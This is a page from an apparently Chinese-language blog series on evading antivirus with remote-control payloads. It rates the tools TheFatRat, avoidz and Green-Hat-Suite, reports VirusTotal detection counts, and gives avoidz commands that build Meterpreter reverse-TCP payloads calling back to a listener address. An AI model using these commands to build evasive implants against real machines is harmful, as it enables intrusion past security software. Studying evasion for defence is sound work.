主页 > 网络知识 > 远控免杀从入门到实践(2)工具总结篇(4)

远控免杀从入门到实践(2)工具总结篇(4)

 

远控免杀从入门到实践(2)工具总结篇

 

使用 TheFatRat 编译 C#+powershell 生成 exe,virustotal.com 中 37/71 个报毒

 

远控免杀从入门到实践(2)工具总结篇

 

TheFatRat 的很多免杀方式是借助于 msfvenom 编码、upx 等加壳压缩、c/c# 编译等将 powershell 混淆后编译成 exe 或 bat 文件,但有些在执行时还是会调用 powershell,而 powershell 的调用已经被各大杀软盯的很紧了,所以查杀效果只能算是一般了。

3.7 Avoidz 免杀 (VT 免杀率 23/71)

操作便利★★

免杀效果★★★

推荐指数★★★

详细文章链接:https://mp.weixin.qq.com/s/TnfTXihlyv696uCiv3aWfg

avoidz 是一个比较使用比较简单的小工具,利用 msf 生成 powershell 的 shellocde,然后利用 c#、python、go、ruby 等语言对 shellcode 进行编译生成 exe 而达到免杀的效果,套路比较简单,静态检测查杀率还算可以,但行为检测就很容易被查杀出来,和 TheFatRat 具有相同的缺陷。倒是可以借鉴下他的原理,自己写个免杀工具。

使用 avoidz 编译 C# 生成 exe(VT 免杀率 23/68)

提供 3 种 C 代码编译成 exe 的方式,想了解详情的可以 cat avoidz.rb 查看具体区别。

我以第一种为例进行测试

./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f c1

 

远控免杀从入门到实践(2)工具总结篇

 

执行后可正常上线。开启杀软进行测试,静态测试没问题,行为检测马上露馅。

 

远控免杀从入门到实践(2)工具总结篇

 

virustotal.com 中 23/68 个报毒

 

远控免杀从入门到实践(2)工具总结篇

使用 avoidz 编译 python 生成 exe(VT 免杀率 11/68)

 

使用 python 生成 exe 文件

./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f py

静态查杀没问题,行为检测依旧被拦

 

远控免杀从入门到实践(2)工具总结篇

 

virustotal.com 中 11/68 个报毒

 

远控免杀从入门到实践(2)工具总结篇

使用 avoidz 编译 golang 生成 exe(VT 免杀率 23/71)

 

使用 go 生成 exe 文件

./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f go

go 版本的静态查杀都没通过,行为检测依据被拦

 

远控免杀从入门到实践(2)工具总结篇

 

virustotal.com 中 23/71 个报毒

 

远控免杀从入门到实践(2)工具总结篇

 

3.8 Green-Hat-Suite 免杀 (VT 免杀率 23/70)

操作便利★★★★

免杀效果★★★★

推荐指数★★★★

详细文章链接:https://mp.weixin.qq.com/s/MVJTXOIqjgL7iEHrnq6OJg

Green-Hat-Suite 是国内大佬 Green-m 的大作,Green-m 大佬在 freebuf 和自己博客上 https://green-m.me/写了很多免杀相关的文章,开始的几篇文章里面有一些知识点就是从他那学到的,而且 msfvenom 命令自动补全脚本也是出自他之手,之前有的知识点写的不太准备大佬也热情的给予指正,万分感谢!

Green-Hat-Suite 也是和 msf 无缝对接的免杀工具,使用 ruby 开发,可在 linux/windows 上安装,使用非常简单,虽然已经接近两年没有更新了,但目前来看免杀效果仍然很不错。

virustotal.com 中 23/70 个报毒

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!